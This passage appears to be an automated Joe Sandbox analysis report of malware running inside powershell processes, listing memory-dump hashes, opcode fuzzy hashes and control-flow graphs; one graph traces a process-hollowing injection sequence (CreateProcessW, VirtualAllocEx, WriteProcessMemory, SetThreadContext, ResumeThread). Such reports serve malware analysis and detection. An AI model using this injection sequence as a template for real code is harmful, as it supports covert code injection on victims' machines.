                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 9bf01be0ea1f25e8852decf771ee8df4832c3581613a252b06886591bcc5d71b
                                                                                                                                                                                                                              • Instruction ID: 770b88d4eba54de898315aaf1bea0faf9c0bfad725643f768c2351bba448d5df
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bf01be0ea1f25e8852decf771ee8df4832c3581613a252b06886591bcc5d71b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C01D4310093809EE710CA6ADD84767BFE8EF41328F0CC87DED489A156D2799842C6B1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1823299254.00000000035CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035CD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_35cd000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: ee12ae61e32b7ea7d824a793bd7147db096f2f7e4c8b419b9086faeab9ae3003
                                                                                                                                                                                                                              • Instruction ID: 1441547122a265afbb72be3d922b1a903e8c565122d4b01529fc56a2f23ceb15
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee12ae61e32b7ea7d824a793bd7147db096f2f7e4c8b419b9086faeab9ae3003
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D801407100E3C09ED7128B25DC94B52BFB4EF47224F1D84DBD9889F1A7D2699845C772
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1828985386.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-1608119003
                                                                                                                                                                                                                              • Opcode ID: 0d32afcd3005749ca440dacae61fbbb6c252d57619ae142da8b86c4014453eee
                                                                                                                                                                                                                              • Instruction ID: e038081b07d28eee42fe5df8d1b884b84f47a2f03e5ab74051b110344f2bfe9a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d32afcd3005749ca440dacae61fbbb6c252d57619ae142da8b86c4014453eee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10A167B17043179FDB254A69A81067AFBE5AFC6620F28847BD485CB3A1DB31CC45CBE1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1828985386.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-1041444323
                                                                                                                                                                                                                              • Opcode ID: 1ce3ab82cf0fef103fcd7fa4508542d89503248d1429e5dee7e20c9e7ee99a26
                                                                                                                                                                                                                              • Instruction ID: 1d5d8d50a8626006360bc58fad4a145bb50eb5c9692de85a87b0b8fdd1858389
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ce3ab82cf0fef103fcd7fa4508542d89503248d1429e5dee7e20c9e7ee99a26
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A210871B4935B4FCB2A156838201A9EFF71FC256072944BBC441CF35ACE258C494392
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1828985386.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7d90000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-2125118731
                                                                                                                                                                                                                              • Opcode ID: 3472a785e92be54088e42ed16bb9587468e7fe7ce12ed6c43f8adea773ca95b5
                                                                                                                                                                                                                              • Instruction ID: b319b652e68ae8597def1c5b7a3425d550fa07bdcbec62b59dff581048b1af43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3472a785e92be54088e42ed16bb9587468e7fe7ce12ed6c43f8adea773ca95b5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 502166B171430A9BEF34596E8C04BABEBDA9BC2714F64843AE405CF385CE32C8458361
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000007.00000002.2657530595.000000000372D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0372D000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_7_2_372d000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: afc63652498309a6f4a2b1d53a1e1a9e62bde87140b6c13b3ed265df29942222
                                                                                                                                                                                                                              • Instruction ID: f5758eac0ef6020235ce32bce993fa25b208a28b3f96d1188a327f2ae5a0c571
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: afc63652498309a6f4a2b1d53a1e1a9e62bde87140b6c13b3ed265df29942222
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F012B711083189AE730CA25CD84B67FFDCDF41324F0CC569EC684B156C279D841C6B1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000007.00000002.2657530595.000000000372D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0372D000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_7_2_372d000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: e8c6cbf3290623a964a9fa6985fd7d86b444408319cc784c39f9463969857dc6
                                                                                                                                                                                                                              • Instruction ID: 11fa676255ae8cf346cdc3496c287882299ab96d4d17df5fa21320ba0f176c7e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8c6cbf3290623a964a9fa6985fd7d86b444408319cc784c39f9463969857dc6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20012D6100E3C49ED7228B258894B62BFB4EF47224F1D81DBD8888F1A3C2699848C772
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000007.00000002.2659098541.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_7_2_4df0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 1c27c1573b4e3f42b3a4ef3340846f09b22589ad566c0f11f8d5151dcad7fd9d
                                                                                                                                                                                                                              • Instruction ID: b7a411d1e5e3396aaf1ad6144835461ae929ebb38e48d8635e34442d11ee2825
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c27c1573b4e3f42b3a4ef3340846f09b22589ad566c0f11f8d5151dcad7fd9d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DBF0D435A001099FCB15CF9DD990AEEF7B1FF88324F218159E915A72A1C736EC62CB60

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:7.6%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:71.9%
                                                                                                                                                                                                                              Total number of Nodes:32
                                                                                                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                                                                                                              execution_graph 10551 2b997c7 10552 2b997b1 10551->10552 10553 2b9986d 10552->10553 10556 2b99d98 10552->10556 10557 2b99da2 10556->10557 10558 2b998c5 10556->10558 10560 2b99e10 10557->10560 10562 2b99e8d 10560->10562 10561 2b9a514 10564 2b9a6f5 CreateProcessW 10561->10564 10582 2b9a408 10561->10582 10562->10561 10584 2b98950 10562->10584 10567 2b9a769 10564->10567 10565 2b99f18 10565->10561 10566 2b9895c Wow64SetThreadContext 10565->10566 10568 2b99f83 10566->10568 10568->10561 10569 2b9a096 VirtualAllocEx 10568->10569 10568->10582 10570 2b9a0e3 10569->10570 10570->10561 10571 2b9a131 VirtualAllocEx 10570->10571 10573 2b9a185 10570->10573 10571->10573 10572 2b98974 WriteProcessMemory 10574 2b9a1cf 10572->10574 10573->10561 10573->10572 10573->10582 10574->10561 10575 2b9a319 10574->10575 10574->10582 10583 2b98974 WriteProcessMemory 10574->10583 10575->10561 10576 2b98974 WriteProcessMemory 10575->10576 10577 2b9a342 10576->10577 10577->10561 10578 2b98980 Wow64SetThreadContext 10577->10578 10577->10582 10579 2b9a3b7 10578->10579 10579->10561 10580 2b9a3bf 10579->10580 10581 2b9a3c8 ResumeThread 10580->10581 10580->10582 10581->10582 10582->10558 10583->10574 10585 2b9a610 CreateProcessW 10584->10585 10587 2b9a769 10585->10587

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 446 2b99e10-2b99ec1 450 2b9a5f9-2b9a689 446->450 451 2b99ec7-2b99ed7 446->451 456 2b9a68b-2b9a68e 450->456 457 2b9a691-2b9a698 450->457 454 2b99ed9-2b99ede 451->454 455 2b99ee0 451->455 460 2b99ee2-2b99ee4 454->460 455->460 456->457 458 2b9a69a-2b9a6a0 457->458 459 2b9a6a3-2b9a6b9 457->459 458->459 461 2b9a6bb-2b9a6c1 459->461 462 2b9a6c4-2b9a767 CreateProcessW 459->462 463 2b99efb-2b99f1a call 2b98950 460->463 464 2b99ee6-2b99ef9 460->464 461->462 469 2b9a769-2b9a76f 462->469 470 2b9a770-2b9a7e8 462->470 471 2b99f1c-2b99f21 463->471 472 2b99f23 463->472 464->463 469->470 492 2b9a7fa-2b9a801 470->492 493 2b9a7ea-2b9a7f0 470->493 473 2b99f25-2b99f27 471->473 472->473 474 2b99f2d-2b99f42 473->474 475 2b9a56f-2b9a582 473->475 481 2b99f48-2b99f6c 474->481 482 2b9a56a 474->482 486 2b9a589-2b9a59f 475->486 481->486 491 2b99f72-2b99f85 call 2b9895c 481->491 482->475 486->450 501 2b9a5a1-2b9a5ab 486->501 502 2b99f8b-2b99f92 491->502 503 2b9a50d-2b9a50f 491->503 494 2b9a818 492->494 495 2b9a803-2b9a812 492->495 493->492 500 2b9a819 494->500 495->494 500->500 510 2b9a5ad-2b9a5b4 501->510 511 2b9a5b6-2b9a5b8 501->511 504 2b99f98-2b99fa2 502->504 505 2b9a4f3-2b9a506 502->505 504->486 507 2b99fa8-2b99fc5 504->507 505->503 507->482 508 2b99fcb-2b99fe5 call 2b98968 507->508 518 2b99feb-2b99ff2 508->518 519 2b9a514 508->519 513 2b9a5ba-2b9a5be 510->513 511->513 516 2b9a5c0 call 2b98dc0 513->516 517 2b9a5c5-2b9a5d2 513->517 516->517 530 2b9a5d9-2b9a5f6 517->530 522 2b9a4d9-2b9a4ec 518->522 523 2b99ff8-2b9a001 518->523 526 2b9a51b 519->526 522->505 524 2b9a06c-2b9a072 523->524 525 2b9a003-2b9a047 523->525 524->482 529 2b9a078-2b9a088 524->529 534 2b9a049-2b9a04f 525->534 535 2b9a050-2b9a05c 525->535 532 2b9a525 526->532 529->482 537 2b9a08e-2b9a0e1 VirtualAllocEx 529->537 538 2b9a52c 532->538 534->535 535->526 539 2b9a062-2b9a066 535->539 544 2b9a0ea-2b9a108 537->544 545 2b9a0e3-2b9a0e9 537->545 543 2b9a533 538->543 539->524 541 2b9a4bf-2b9a4d2 539->541 541->522 548 2b9a53a 543->548 544->532 547 2b9a10e-2b9a115 544->547 545->544 551 2b9a11b-2b9a122 547->551 552 2b9a19c-2b9a1a3 547->552 553 2b9a541 548->553 551->538 555 2b9a128-2b9a12f 551->555 552->543 554 2b9a1a9-2b9a1b0 552->554 559 2b9a54b 553->559 556 2b9a4a5-2b9a4b8 554->556 557 2b9a1b6-2b9a1d1 call 2b98974 554->557 555->552 558 2b9a131-2b9a183 VirtualAllocEx 555->558 556->541 557->548 566 2b9a1d7-2b9a1de 557->566 561 2b9a18c-2b9a196 558->561 562 2b9a185-2b9a18b 558->562 565 2b9a552 559->565 561->552 562->561 571 2b9a559 565->571 569 2b9a48b-2b9a49e 566->569 570 2b9a1e4-2b9a1ed 566->570 569->556 570->482 572 2b9a1f3-2b9a1f9 570->572 575 2b9a563 571->575 572->482 574 2b9a1ff-2b9a20a 572->574 574->482 578 2b9a210-2b9a216 574->578 575->482 579 2b9a319-2b9a32a 578->579 580 2b9a21c-2b9a221 578->580 579->482 583 2b9a330-2b9a344 call 2b98974 579->583 580->482 581 2b9a227-2b9a23a 580->581 581->482 585 2b9a240-2b9a253 581->585 583->565 589 2b9a34a-2b9a351 583->589 585->482 590 2b9a259-2b9a26e 585->590 591 2b9a457-2b9a46a 589->591 592 2b9a357-2b9a35d 589->592 590->553 596 2b9a274-2b9a278 590->596 606 2b9a471-2b9a484 591->606 592->482 593 2b9a363-2b9a374 592->593 593->571 598 2b9a37a-2b9a37e 593->598 599 2b9a2ff-2b9a302 596->599 600 2b9a27e-2b9a287 596->600 602 2b9a389-2b9a391 598->602 603 2b9a380-2b9a383 598->603 599->482 604 2b9a308-2b9a30b 599->604 600->482 605 2b9a28d-2b9a290 600->605 602->482 607 2b9a397-2b9a3a1 602->607 603->602 604->482 608 2b9a311-2b9a313 604->608 605->482 609 2b9a296-2b9a2c6 605->609 606->569 607->486 610 2b9a3a7-2b9a3b9 call 2b98980 607->610 608->579 608->580 609->482 620 2b9a2cc-2b9a2e5 call 2b98974 609->620 610->575 616 2b9a3bf-2b9a3c6 610->616 618 2b9a3c8-2b9a406 ResumeThread 616->618 619 2b9a423-2b9a436 616->619 621 2b9a408-2b9a40e 618->621 622 2b9a40f-2b9a41c 618->622 626 2b9a43d-2b9a450 619->626 625 2b9a2ea-2b9a2ec 620->625 621->622 622->626 627 2b9a41e-2b9a5d4 622->627 625->559 628 2b9a2f2-2b9a2f9 625->628 626->591 627->530 628->599 628->606
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 02B9A0CA
                                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 02B9A16C
                                                                                                                                                                                                                                • Part of subcall function 02B98974: WriteProcessMemory.KERNELBASE(?,00000000,00000000,183D2514,00000000,?,?,?,00000000,00000000,?,02B9A1CF,?,00000000,?), ref: 02B9AA44
                                                                                                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 02B9A3EF
                                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 02B9A754
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4270437565-0
                                                                                                                                                                                                                              • Opcode ID: e01baeff6cdbc9ec7b27f57a76ace17d3fefe57a48bbb482be72a08a64bcf79a
                                                                                                                                                                                                                              • Instruction ID: 91a883f4c0d89cc45050f657c9bbd1cee7c0ac405e00fe488181c3d25a5a0b1e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e01baeff6cdbc9ec7b27f57a76ace17d3fefe57a48bbb482be72a08a64bcf79a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42429B70A002198FDF24DF69C954B9EBBB2EF84704F2481E9D909AB291DB34DE85CF51

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1008 2b998d6-2b99905 1009 2b9990e-2b9991e 1008->1009 1010 2b99907-2b99909 1008->1010 1012 2b99920 1009->1012 1013 2b99925-2b99935 1009->1013 1011 2b99bda-2b99be1 1010->1011 1012->1011 1015 2b9993b-2b99949 1013->1015 1016 2b99bc1-2b99bcf 1013->1016 1020 2b99be2-2b99c6b 1015->1020 1021 2b9994f 1015->1021 1019 2b99bd1-2b99bd5 call 2b91f80 1016->1019 1016->1020 1019->1011 1021->1020 1023 2b99998-2b999b9 1021->1023 1024 2b99b1b-2b99b41 1021->1024 1025 2b99a7d-2b99aa5 1021->1025 1026 2b999be-2b999e0 1021->1026 1027 2b99a31-2b99a52 1021->1027 1028 2b99b91-2b99bb3 1021->1028 1029 2b99bb5-2b99bbf 1021->1029 1030 2b99b74-2b99b8f call 2b90318 1021->1030 1031 2b99a57-2b99a78 1021->1031 1032 2b99ad7-2b99b16 1021->1032 1033 2b99956-2b99965 1021->1033 1034 2b99a0b-2b99a2c 1021->1034 1035 2b99aaa-2b99ad2 1021->1035 1036 2b999e5-2b99a06 1021->1036 1037 2b99b46-2b99b72 1021->1037 1023->1011 1024->1011 1025->1011 1026->1011 1027->1011 1028->1011 1029->1011 1030->1011 1031->1011 1032->1011 1055 2b9997e-2b9998d 1033->1055 1056 2b99967-2b9997c 1033->1056 1034->1011 1035->1011 1036->1011 1037->1011 1081 2b99993 1055->1081 1056->1081 1081->1011
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: Xbq$$^q
                                                                                                                                                                                                                              • API String ID: 0-1593437937
                                                                                                                                                                                                                              • Opcode ID: 72c4b394d21104860c97db3125f7326144a697cfe43d2f5c1a326450f0528e3d
                                                                                                                                                                                                                              • Instruction ID: 807553e26fc41e15a7120aa9643c55e06b328501a424d006d702d7399cf159cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72c4b394d21104860c97db3125f7326144a697cfe43d2f5c1a326450f0528e3d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FA19274B042188BDB59AB78886477E7BB7FFC5700B05896DD046E7295CE38D803C792

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 70c15d8-70c15fb 1 70c17d6-70c17dc 0->1 2 70c1601-70c1606 0->2 12 70c17de 1->12 13 70c17e1-70c181b 1->13 3 70c161e-70c1622 2->3 4 70c1608-70c160e 2->4 5 70c1628-70c162c 3->5 6 70c1783-70c178d 3->6 8 70c1610 4->8 9 70c1612-70c161c 4->9 10 70c162e-70c163d 5->10 11 70c163f 5->11 14 70c178f-70c1798 6->14 15 70c179b-70c17a1 6->15 8->3 9->3 16 70c1641-70c1643 10->16 11->16 12->13 17 70c1821-70c1826 13->17 18 70c1972-70c1978 13->18 19 70c17a7-70c17b3 15->19 20 70c17a3-70c17a5 15->20 16->6 22 70c1649-70c1669 16->22 23 70c183e-70c1842 17->23 24 70c1828-70c182e 17->24 32 70c197d-70c19be 18->32 33 70c197a 18->33 25 70c17b5-70c17d3 19->25 20->25 57 70c1688 22->57 58 70c166b-70c1686 22->58 30 70c191f-70c1929 23->30 31 70c1848-70c184a 23->31 27 70c1830 24->27 28 70c1832-70c183c 24->28 27->23 28->23 34 70c192b-70c1934 30->34 35 70c1937-70c193d 30->35 38 70c184c-70c1858 31->38 39 70c185a 31->39 41 70c1b2b-70c1b60 32->41 42 70c19c4-70c19c9 32->42 33->32 43 70c193f-70c1941 35->43 44 70c1943-70c194f 35->44 40 70c185c-70c185e 38->40 39->40 40->30 46 70c1864-70c1868 40->46 62 70c1b70 41->62 63 70c1b62-70c1b6e 41->63 47 70c19cb-70c19d1 42->47 48 70c19e1-70c19e5 42->48 49 70c1951-70c196f 43->49 44->49 52 70c1888 46->52 53 70c186a-70c1886 46->53 55 70c19d5-70c19df 47->55 56 70c19d3 47->56 60 70c1ada-70c1ae4 48->60 61 70c19eb-70c19ed 48->61 64 70c188a-70c188c 52->64 53->64 55->48 56->48 67 70c168a-70c168c 57->67 58->67 65 70c1ae6-70c1aef 60->65 66 70c1af2-70c1af8 60->66 69 70c19fd 61->69 70 70c19ef-70c19fb 61->70 73 70c1b72-70c1b74 62->73 63->73 64->30 74 70c1892-70c18a5 64->74 75 70c1afe-70c1b0a 66->75 76 70c1afa-70c1afc 66->76 67->6 79 70c1692-70c1694 67->79 71 70c19ff-70c1a01 69->71 70->71 71->60 82 70c1a07-70c1a09 71->82 83 70c1bee-70c1bf8 73->83 84 70c1b76-70c1b78 73->84 107 70c18ab-70c18ad 74->107 85 70c1b0c-70c1b28 75->85 76->85 80 70c16a4 79->80 81 70c1696-70c16a2 79->81 87 70c16a6-70c16a8 80->87 81->87 88 70c1a19 82->88 89 70c1a0b-70c1a17 82->89 91 70c1bfa-70c1c00 83->91 92 70c1c03-70c1c09 83->92 93 70c1b88 84->93 94 70c1b7a-70c1b86 84->94 87->6 99 70c16ae-70c16ce 87->99 100 70c1a1b-70c1a1d 88->100 89->100 101 70c1c0f-70c1c1b 92->101 102 70c1c0b-70c1c0d 92->102 103 70c1b8a-70c1b8c 93->103 94->103 133 70c16e6-70c16ea 99->133 134 70c16d0-70c16d6 99->134 100->60 104 70c1a23-70c1a25 100->104 105 70c1c1d-70c1c36 101->105 102->105 103->83 106 70c1b8e-70c1b94 103->106 110 70c1a3f-70c1a43 104->110 111 70c1a27-70c1a2d 104->111 113 70c1b96-70c1b98 106->113 114 70c1ba2-70c1bab 106->114 115 70c18af-70c18b5 107->115 116 70c18c5-70c191c 107->116 123 70c1a5d-70c1ad7 110->123 124 70c1a45-70c1a4b 110->124 121 70c1a2f 111->121 122 70c1a31-70c1a3d 111->122 113->114 118 70c1bad-70c1baf 114->118 119 70c1bb9-70c1bd6 114->119 125 70c18b9-70c18bb 115->125 126 70c18b7 115->126 118->119 137 70c1bd8-70c1be8 119->137 138 70c1c39-70c1c3e 119->138 121->110 122->110 128 70c1a4d 124->128 129 70c1a4f-70c1a5b 124->129 125->116 126->116 128->123 129->123 141 70c16ec-70c16f2 133->141 142 70c1704-70c1708 133->142 139 70c16d8 134->139 140 70c16da-70c16dc 134->140 137->83 138->137 139->133 140->133 144 70c16f4 141->144 145 70c16f6-70c1702 141->145 148 70c170f-70c1711 142->148 144->142 145->142 150 70c1729-70c1780 148->150 151 70c1713-70c1719 148->151 152 70c171d-70c171f 151->152 153 70c171b 151->153 152->150 153->150
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-2118039658
                                                                                                                                                                                                                              • Opcode ID: 156e3053c060e311fe53b0978c37d709d02e19b6ac5d11adc4447775a04b04cc
                                                                                                                                                                                                                              • Instruction ID: 496392018d8862bdc25f6bf477f43ebcd7f22eff980f17f0f25d2cec809b671b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 156e3053c060e311fe53b0978c37d709d02e19b6ac5d11adc4447775a04b04cc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F14BF1B0430E9FDB64DB79C80066EBBE6AFC5210F2886AED415CB256DA31C845C7A1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-1590887
                                                                                                                                                                                                                              • Opcode ID: 84de0eb1ff649cabd48fbcc2d43e284eb432d6f124af17880a48930cad5dd163
                                                                                                                                                                                                                              • Instruction ID: 1e2a30eb44f7320d567a7294ab6e65157c40dc287e5c73c8d91f9f09782031b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84de0eb1ff649cabd48fbcc2d43e284eb432d6f124af17880a48930cad5dd163
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E1212B1B0020ADFDB54DF68C8547AEBBE6BB85310F14C6BED4158B255DB31C886CB92

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 335 70c1fc8-70c1fee 336 70c219a-70c21a0 335->336 337 70c1ff4-70c1ff9 335->337 345 70c21a5-70c21bc 336->345 346 70c21a2 336->346 338 70c1ffb-70c2001 337->338 339 70c2011-70c2015 337->339 341 70c2005-70c200f 338->341 342 70c2003 338->342 343 70c201b-70c201d 339->343 344 70c2146-70c2150 339->344 341->339 342->339 347 70c202d 343->347 348 70c201f-70c202b 343->348 349 70c215e-70c2164 344->349 350 70c2152-70c215b 344->350 353 70c21be-70c21e2 345->353 354 70c2217-70c2218 345->354 346->345 351 70c202f-70c2031 347->351 348->351 355 70c216a-70c2176 349->355 356 70c2166-70c2168 349->356 351->344 360 70c2037-70c203b 351->360 361 70c21e8-70c21ed 353->361 362 70c2314-70c231c 353->362 358 70c2229-70c222d 354->358 359 70c2219-70c221f 354->359 357 70c2178-70c2197 355->357 356->357 369 70c222f-70c2235 358->369 370 70c2247-70c2252 358->370 368 70c2223-70c2225 359->368 363 70c203d-70c204c 360->363 364 70c204e 360->364 365 70c21ef-70c21f5 361->365 366 70c2205-70c2209 361->366 384 70c231e 362->384 385 70c2321-70c2330 362->385 371 70c2050-70c2052 363->371 364->371 372 70c21f9-70c2203 365->372 373 70c21f7 365->373 375 70c220f-70c2211 366->375 376 70c22c6-70c22d0 366->376 368->358 368->376 378 70c2239-70c2245 369->378 379 70c2237 369->379 392 70c226a-70c22c3 370->392 393 70c2254-70c225a 370->393 371->344 380 70c2058-70c205a 371->380 372->366 373->366 382 70c2221 375->382 383 70c2213 375->383 386 70c22dd-70c22e3 376->386 387 70c22d2-70c22d4 376->387 378->370 379->370 389 70c205c-70c2068 380->389 390 70c206a 380->390 382->368 383->354 384->385 395 70c22d6-70c22da 385->395 396 70c2332-70c2345 385->396 397 70c22e9-70c22f5 386->397 398 70c22e5-70c22e7 386->398 387->395 400 70c206c-70c206e 389->400 390->400 401 70c225c 393->401 402 70c225e-70c2260 393->402 403 70c2355 396->403 404 70c2347-70c2353 396->404 399 70c22f7-70c2311 397->399 398->399 400->344 408 70c2074-70c2076 400->408 401->392 402->392 406 70c2357-70c2359 403->406 404->406 412 70c235b-70c237a 406->412 413 70c23c7-70c23d1 406->413 410 70c2078-70c207e 408->410 411 70c2090-70c209b 408->411 416 70c2080 410->416 417 70c2082-70c208e 410->417 418 70c209d-70c20a0 411->418 419 70c20aa-70c20b6 411->419 434 70c237c-70c2388 412->434 435 70c238a 412->435 414 70c23da-70c23e0 413->414 415 70c23d3-70c23d7 413->415 421 70c23e6-70c23f2 414->421 422 70c23e2-70c23e4 414->422 416->411 417->411 418->419 424 70c20b8-70c20ba 419->424 425 70c20c4-70c20cb 419->425 426 70c23f4-70c2412 421->426 422->426 424->425 428 70c20d2-70c20d4 425->428 431 70c20ec-70c2143 428->431 432 70c20d6-70c20dc 428->432 436 70c20de 432->436 437 